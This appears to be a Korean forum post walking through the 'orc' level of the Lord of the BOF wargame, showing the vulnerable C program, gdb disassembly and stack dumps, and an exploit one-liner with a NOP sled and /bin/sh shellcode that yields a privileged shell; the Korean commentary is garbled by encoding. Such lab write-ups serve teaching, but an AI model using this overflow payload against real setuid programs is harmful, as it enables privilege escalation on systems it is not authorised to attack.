|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8606 [º¹»ç]
[C:\~]$ telnet 192.168.0.22
Connecting to 192.168.0.22:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: goblin
Password:
[goblin@localhost goblin]$ bash2
[goblin@localhost goblin]$ ls -al
total 52
drwx------ 2 goblin goblin 4096 Jul 1 15:05 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 goblin goblin 78 Jul 1 15:05 .bash_history
-rw-r--r-- 1 goblin goblin 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 goblin goblin 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 goblin goblin 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 goblin goblin 333 Feb 26 2010 .emacs
-rw-r--r-- 1 goblin goblin 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 orc orc 12567 Feb 26 2010 orc
-rw-r--r-- 1 root root 505 Mar 29 2010 orc.c
[goblin@localhost goblin]$ cat orc.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
===============================
¼Ò½º Äڵ带 º¸¸é argv[1][47]ÀÌ \xbf°ªÀ̾î¾ßÇÑ´Ù.
buffer[0]~[39]±îÁø ÀÓÀÇÀÇ°ª
[40]~[43]±îÁø sfp, [44]~[48]±îÁø ¸®ÅÏ ¾îµå·¹½º °ªÀÌ´Ù.
[48]Àº \xbf°¡ µé¾î°¡¾ß µÇ´Âµ¥...
¹¹... ¿©Áö²¯ Ç®¾úÀ¸¸é ´ç¿¬ÇÏ°Ô ´À²¸Áú °ÍÀÌ´Ù.
¹®Á¦´Â ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ enviorment°ªÀÌ ÃʱâÈ°¡ µÈ´Ù´À °ÍÀÌ´Ù.
±×·¸´Ù¸é ÆäÀ̷ε带...
0~43 | 44 ~ 47 | 48 ~ 148 | 149~
nop | ret | nop | ½©ÄÚµå
Áï, buffer[47]ÀÌÈÄ¿¡ nopÀ» 100°³Á¤µµ ³Ö°í
±× µÚ¿¡ ½©Äڵ带 ÆäÀ̷εå·Î ¼³ÀåÇÏ¸é µÈ´Ù.
===============================
[goblin@localhost goblin]$ mkdir tmp
[goblin@localhost goblin]$ ls
orc orc.c tmp
[goblin@localhost goblin]$ cp orc tmp
[goblin@localhost goblin]$ cd tmp
[goblin@localhost tmp]$ ls
orc
[goblin@localhost tmp]$ gdb -q orc
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048630
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x8049750
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x8049750
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x8049750
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
---Type <return> to continue, or q <return> to quit---
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x804863c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea %eax,[%ebp-40]
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048659
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: leave
0x80485d7 <main+215>: ret
0x80485d8 <main+216>: nop
0x80485d9 <main+217>: nop
0x80485da <main+218>: nop
0x80485db <main+219>: nop
0x80485dc <main+220>: nop
0x80485dd <main+221>: nop
0x80485de <main+222>: nop
0x80485df <main+223>: nop
End of assembler dump.
(gdb) b *main+189
Breakpoint 1 at 0x80485bd
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+
Starting program: /home/goblin/tmp/orc `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+
/bin/bash: unexpected EOF while looking for ``'
/bin/bash: -c: line 2: syntax error
Program exited with code 02.
You can't do that without a process to debug.
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/goblin/tmp/orc `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x80485bd in main ()
(gdb) x/512x $esp
0xbffffa04: 0xbffffa10 0xbffffb99 0x00000017 0xbffffa38
0xbffffa14: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffa24: 0xbffffa84 0xbffffa38 0x080484eb 0x0804966c
0xbffffa34: 0x08049680 0xbffffa58 0x400309cb 0x00000002
0xbffffa44: 0xbffffa84 0xbffffa90 0x40013868 0x00000002
0xbffffa54: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa64: 0x00000002 0xbffffa84 0x08048390 0x0804860c
0xbffffa74: 0x4000ae60 0xbffffa7c 0x40013e90 0x00000002
0xbffffa84: 0xbffffb84 0xbffffb99 0x00000000 0xbffffc47
0xbffffa94: 0xbffffc69 0xbffffc73 0xbffffc81 0xbffffca0
0xbffffaa4: 0xbffffcaf 0xbffffcc7 0xbffffce3 0xbffffd02
0xbffffab4: 0xbffffd0d 0xbffffd1b 0xbffffd5d 0xbffffd71
0xbffffac4: 0xbffffd83 0xbffffd98 0xbffffda8 0xbffffdb4
0xbffffad4: 0xbffffdd2 0xbffffdeb 0xbffffdf6 0xbffffe07
0xbffffae4: 0xbffffe1c 0xbffffe24 0x00000000 0x00000003
0xbffffaf4: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb04: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb14: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb24: 0x08048450 0x0000000b 0x000001f7 0x0000000c
0xbffffb34: 0x000001f7 0x0000000d 0x000001f7 0x0000000e
0xbffffb44: 0x000001f7 0x00000010 0x0febfbff 0x0000000f
0xbffffb54: 0xbffffb7f 0x00000000 0x00000000 0x00000000
0xbffffb64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb74: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffb84: 0x6d6f682f 0x6f672f65 0x6e696c62 0x706d742f
0xbffffb94: 0x63726f2f 0x90909000 0x90909090 0x90909090
0xbffffba4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc4: 0xbfbfbf90 0x909090bf 0x90909090 0x90909090
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffffc34: 0x622f6868 0xe3896e69 0xe1895350 0x0bb0c289
0xbffffc44: 0x000080cd 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef4: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbfffff04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffe4: 0x2f000000 0x656d6f68 0x626f672f 0x2f6e696c
0xbffffff4: 0x2f706d74 0x0063726f 0x00000000 Cannot access memory at address 0xc0000000
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) q
The program is running. Exit anyway? (y or n) y
[goblin@localhost tmp]$ cd ..
[goblin@localhost goblin]$ ls
orc orc.c tmp
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
?y¢¯1??h//shh/bin??¡Æ
?
bash$ my-pass
euid = 504
[????????????????]
bash$ id
uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)
bash$
|
Hit : 1026 Date : 2025/07/02 06:59
|
1617, 
1/81 
